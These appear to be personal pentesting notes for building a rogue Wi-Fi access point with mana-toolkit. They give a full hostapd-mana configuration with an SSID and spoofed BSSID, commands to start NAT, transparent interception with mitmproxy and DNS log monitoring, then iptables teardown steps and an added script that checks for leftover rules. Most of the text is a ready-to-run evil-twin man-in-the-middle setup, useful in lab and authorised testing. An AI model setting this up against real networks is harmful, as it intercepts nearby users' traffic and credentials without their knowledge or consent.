Creating a rogue AP
Edit the configuration file /etc/mana-toolkit/hostapd-mana.conf
Set the interface, SSID, channel and BSSID
improved version from
hostapd-mana.conf
interface=wlan0
hw_mode=g
channel=10
ieee80211d=1
country_code=GY
ieee80211n=1
wmm_enabled=1
driver=nl80211
ssid=mirage21
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=somepassword
bssid=30:b4:a1:37:f0:f0

# Prevent disassociations
disassoc_low_ack=0
ap_max_inactivity=3000

# no SSID cloaking
#ignore_broadcast_ssid=0

# -1 = log all messages
logger_syslog=-1
logger_stdout=-1

# 2 = informational messages
logger_syslog_level=2
logger_stdout_level=2

ctrl_interface=/var/run/hostapd
ctrl_interface_group=0

# Finally, enable mana
#enable_mana=1
# Limit mana to responding only to the device probing (0), or not (1)
#mana_loud=0
# Extend MAC ACLs to probe frames
#mana_macacl=0

# Put hostapd in white/black list mode
#macaddr_acl=0
# only used if you want to do filter by MAC address
#accept_mac_file=/etc/mana-toolkit/hostapd.accept
#deny_mac_file=/etc/mana-toolkit/hostapd.deny
Then run mana-toolkit
cd /usr/share/mana-toolkit/run-mana
sudo ./start-nat-simple.sh
Run the proxy
mitmproxy --mode transparent --showhost
Show the DNS logs
tail -f /tmp/dnsmasq.log


Action refused → because it tries to connect to the SSL certificate but does not find it
Return all settings to default
systemctl restart NetworkManager
systemctl restart apache2
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
systemctl start NetworkManager
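To confirm the reset above actually took effect, the following added example (not part of the original notes) parses `iptables-save` output and lists anything that survived the flush, including chain policies, which `--flush` does not reset. The function name `leftover_rules`, the interface `eth0` and both sample dumps are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): verify the firewall teardown.
# leftover_rules reads `iptables-save` output on stdin, prints what survived,
# and returns non-zero if anything did.
leftover_rules() {
    awk '
        /^\*/  { table = substr($0, 2); next }           # table header: *nat, *filter
        /^-A / { print table ": rule " $0; n++; next }   # a rule that was not flushed
        /^:/ {
            chain = substr($1, 2)
            if ($2 == "-") {                             # "-" policy marks a user-defined chain
                print table ": chain " chain; n++
            } else if ($2 != "ACCEPT") {                 # --flush does not reset policies
                print table ": policy " chain " " $2; n++
            }
        }
        END { exit (n > 0) }
    '
}

# Constructed sample: state after an incomplete teardown (eth0 is a placeholder).
SAMPLE_DIRTY='*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:LEFTOVER - [0:0]
COMMIT'

# Constructed sample: fully reset tables.
SAMPLE_CLEAN='*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT'

# Demo on the constructed samples; on a real host run: sudo iptables-save | leftover_rules
printf '%s\n' "$SAMPLE_DIRTY" | leftover_rules || echo "teardown incomplete"
printf '%s\n' "$SAMPLE_CLEAN" | leftover_rules && echo "tables are back to default"
```

`iptables-save` also dumps tables the commands above do not touch (for example mangle or raw), so entries from those are reported too.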